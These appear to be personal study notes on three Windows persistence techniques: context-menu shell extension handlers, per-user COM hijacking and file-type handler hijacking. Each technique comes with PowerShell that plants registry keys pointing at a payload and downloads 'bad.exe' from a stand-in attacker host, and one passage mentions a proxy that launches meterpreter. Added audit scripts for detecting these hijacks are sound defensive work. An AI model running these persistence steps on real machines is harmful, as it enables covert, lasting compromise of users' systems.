IPC

Created: 03.06.2023

This is about … .

Windows

Shell Extension Handlers

Computer\HKCU\Software\Classes\*\shellex\ContextMenuHandlers. The same key exists under HKLM. ⚠️ No admin credentials are needed to add a value here, as long as it is added under HKCU only. The GUID here is the same one listed under the CLSID subkey. To add a malicious extension one needs to create a unique GUID, add a subkey for it under CLSID, add the path to the DLL there, and then add a shell extension under the key above using the same GUID. Use 🛠 OLE/COM Object Viewer to see all registered COM objects. Simply clicking an image or an archive file may then trigger the malicious action.

# register the context menu handler for all file types, pointing at the GUID
$Path="HKCU:\Software\Classes\*\shellex\ContextMenuHandlers\BadExt"
$Name="(Default)"
$Value="{GUID}"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

# register the GUID itself under CLSID with the path to the server binary
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\tmp\bad.exe"

New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1

$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"

Invoke-WebRequest -Uri $Url -OutFile $Out

COM Hijack

In Process Monitor, filter: Path contains CLSID and Result is NAME NOT FOUND. The entry exists in HKLM\Software\Classes\CLSID\{GUID} but not in HKCU\Software\Classes\CLSID\{GUID}. Windows looks for the entry in HKCU first and falls back to HKLM only if it is not found there. That is where we can add an entry under HKCU. PowerShell needs to be used, since it is a trusted application for registry changes.

# create the per-user copy of the CLSID that Windows resolves before the HKLM one
$Path1="HKCU:\Software\Classes\CLSID\{GUID}\InprocServer32" # example
$Name1="(Default)"
$Value1="C:\tmp\bad.exe"

New-Item -Path $Path1 -Force
New-ItemProperty -Path $Path1 -Name $Name1 -Value $Value1

$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"

Invoke-WebRequest -Uri $Url -OutFile $Out
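For the two CLSID-based techniques above (context menu handlers and per-user COM hijacking), the following audit script is the defender's counterpart. It is an added example, not code from these notes or from the linked articles. It assumes PowerShell 5.1 or later on Windows, and it treats the Windows and Program Files directories as the only trusted locations for COM servers, which is an assumption to adjust for your environment (it also ignores the Wow6432Node view of HKLM).

```powershell
# Added audit example (not from the original notes): list context-menu
# handlers and their COM servers, and find HKCU CLSIDs that shadow HKLM ones.

function Get-ClsidServerPath {
    param([string]$Clsid, [string]$Hive)   # $Hive is 'HKCU' or 'HKLM'
    # Resolve a CLSID to the binary registered as its in-process server.
    $key = "${Hive}:\Software\Classes\CLSID\$Clsid\InprocServer32"
    if (Test-Path -LiteralPath $key) {
        return (Get-ItemProperty -LiteralPath $key).'(default)'
    }
    return $null
}

function Test-SuspiciousServerPath {
    param([string]$ServerPath)
    # Heuristic (assumption): a server outside Windows / Program Files,
    # e.g. under C:\tmp or the user profile, deserves a closer look.
    if (-not $ServerPath) { return $false }
    $expanded = [Environment]::ExpandEnvironmentVariables($ServerPath).Trim('"')
    $trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    foreach ($prefix in $trusted) {
        if ($prefix -and $expanded.StartsWith($prefix, [StringComparison]::OrdinalIgnoreCase)) {
            return $false
        }
    }
    return $true
}

function Get-ContextMenuHandlerFindings {
    # Handlers registered for every file type ('*'), from both hives.
    $results = @()
    foreach ($hive in 'HKCU', 'HKLM') {
        $base = "${hive}:\Software\Classes\*\shellex\ContextMenuHandlers"
        if (-not (Test-Path -LiteralPath $base)) { continue }
        foreach ($handler in Get-ChildItem -LiteralPath $base) {
            $clsid = (Get-ItemProperty -LiteralPath $handler.PSPath).'(default)'
            # Some handlers use the GUID as the subkey name with no default value.
            if (-not $clsid) { $clsid = $handler.PSChildName }
            # Mirror the lookup order: the per-user CLSID wins over the machine one.
            $resolvedFrom = 'HKCU'
            $path = Get-ClsidServerPath -Clsid $clsid -Hive 'HKCU'
            if (-not $path) {
                $resolvedFrom = 'HKLM'
                $path = Get-ClsidServerPath -Clsid $clsid -Hive 'HKLM'
            }
            $results += [pscustomobject]@{
                Handler      = "$hive\...\ContextMenuHandlers\$($handler.PSChildName)"
                Clsid        = $clsid
                ServerPath   = $path
                ResolvedFrom = $resolvedFrom
                Review       = ($resolvedFrom -eq 'HKCU') -or (Test-SuspiciousServerPath $path)
            }
        }
    }
    return $results
}

function Get-ShadowedClsidFindings {
    # COM hijack check: a CLSID present in both HKCU and HKLM is served from
    # HKCU first, so the per-user copy overrides the machine-wide one.
    $results = @()
    $userClsidRoot = 'HKCU:\Software\Classes\CLSID'
    if (-not (Test-Path -LiteralPath $userClsidRoot)) { return $results }
    foreach ($key in Get-ChildItem -LiteralPath $userClsidRoot) {
        $clsid = $key.PSChildName
        if (Test-Path -LiteralPath "HKLM:\Software\Classes\CLSID\$clsid") {
            $userPath = Get-ClsidServerPath -Clsid $clsid -Hive 'HKCU'
            $results += [pscustomobject]@{
                Clsid         = $clsid
                UserServer    = $userPath
                MachineServer = Get-ClsidServerPath -Clsid $clsid -Hive 'HKLM'
                Review        = Test-SuspiciousServerPath $userPath
            }
        }
    }
    return $results
}

Get-ContextMenuHandlerFindings | Where-Object Review | Format-Table -AutoSize
Get-ShadowedClsidFindings      | Format-Table -AutoSize
```

Run it as the user whose profile you are checking, since HKCU is per user. Legitimate per-user software registers context menu handlers and CLSIDs under HKCU too, so the Review column marks entries to inspect, not confirmed findings; a CLSID that exists in both hives with the HKCU server outside trusted directories is the pattern the Process Monitor filter above would also reveal as a NAME NOT FOUND lookup that suddenly starts succeeding.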

Extension Handler Hijacking

Computer\HKCR\<ProgId>, subkeys shell\Open\Command. An attacker can't change HKCR or HKLM, but can change HKCU and HKU without admin privileges. Using a proxy within Command helps stay low-profile: proxy.exe "{path/to/real/app}" (starts the meterpreter, for example, then launches the real application). ⚠️ PowerShell is not necessary here; the HKU hive can be edited without it.

# mount HKEY_USERS as a drive so the per-user Classes hive can be addressed by SID
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
$Path="HKU:\{SID}_Classes\VLC.mp4\shell\Open\Command"
$Name="(Default)"
$Value="C:\tmp\bad.exe"

New-Item -Path $Path -Force
New-ItemProperty -Path $Path -Name $Name -Value $Value

$Url="https://attackersurl/bad.exe"
$Out="C:\tmp\bad.exe"

Invoke-WebRequest -Uri $Url -OutFile $Out
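As an added defender-side example for the file-type handler hijack above (not code from these notes or the linked articles), the script below enumerates per-user shell\<verb>\command overrides and compares each with its machine-wide counterpart. It reads HKCU\Software\Classes, which is the same data the HKU\<SID>_Classes hive exposes for the current user. It assumes PowerShell 5.1 or later; the trusted-directory list and the "two executables in one command" heuristic for spotting the proxy pattern are assumptions, not Windows rules.

```powershell
# Added audit example (not from the original notes): find per-user file-type
# handler overrides and flag the ones that shadow HKLM or look like a proxy.

function Test-SuspiciousShellCommand {
    param([string]$Command)
    if (-not $Command) { return $false }
    $expanded = [Environment]::ExpandEnvironmentVariables($Command)
    # The first token is the executable; handle both quoted and bare paths.
    $exe = if ($expanded.StartsWith('"')) { $expanded.Split('"')[1] } else { $expanded.Split(' ')[0] }
    # Assumption: only Windows and Program Files count as trusted locations.
    $trusted = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")
    $outsideTrusted = $true
    foreach ($prefix in $trusted) {
        if ($prefix -and $exe.StartsWith($prefix, [StringComparison]::OrdinalIgnoreCase)) {
            $outsideTrusted = $false
        }
    }
    # A command naming two executables (proxy.exe "real.exe") matches the
    # pass-through pattern described above and is worth a look on its own.
    $exeCount = ([regex]::Matches($expanded, '\.exe\b', 'IgnoreCase')).Count
    return $outsideTrusted -or ($exeCount -ge 2)
}

function Get-UserFileHandlerOverrides {
    $results = @()
    $userClasses = 'HKCU:\Software\Classes'
    foreach ($progId in Get-ChildItem -LiteralPath $userClasses -ErrorAction SilentlyContinue) {
        $shell = Join-Path $progId.PSPath 'shell'
        if (-not (Test-Path -LiteralPath $shell)) { continue }
        foreach ($verb in Get-ChildItem -LiteralPath $shell) {
            $cmdKey = Join-Path $verb.PSPath 'command'
            if (-not (Test-Path -LiteralPath $cmdKey)) { continue }
            $userCmd = (Get-ItemProperty -LiteralPath $cmdKey).'(default)'
            # The machine-wide handler this per-user key takes precedence over, if any.
            $machineKey = "HKLM:\Software\Classes\$($progId.PSChildName)\shell\$($verb.PSChildName)\command"
            $machineCmd = $null
            if (Test-Path -LiteralPath $machineKey) {
                $machineCmd = (Get-ItemProperty -LiteralPath $machineKey).'(default)'
            }
            $results += [pscustomobject]@{
                ProgId         = $progId.PSChildName
                Verb           = $verb.PSChildName
                UserCommand    = $userCmd
                MachineCommand = $machineCmd
                ShadowsMachine = [bool]$machineCmd
                Review         = Test-SuspiciousShellCommand $userCmd
            }
        }
    }
    return $results
}

Get-UserFileHandlerOverrides |
    Where-Object { $_.Review -or $_.ShadowsMachine } |
    Format-Table ProgId, Verb, ShadowsMachine, Review, UserCommand -AutoSize
```

To audit another profile on the same machine, load that user's UsrClass.dat hive under HKU (or mount HKU as a PSDrive as the notes do) and point $userClasses at HKU:\<SID>_Classes. A user override whose command lives under a user-writable directory such as C:\tmp and whose ProgId is also defined in HKLM is exactly the VLC.mp4 case above.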

Read more about the above techniques: Wipe the drive! Stealthy Malware Persistence - Part 1 and Wipe the drive! Stealthy Malware Persistence - Part 2.
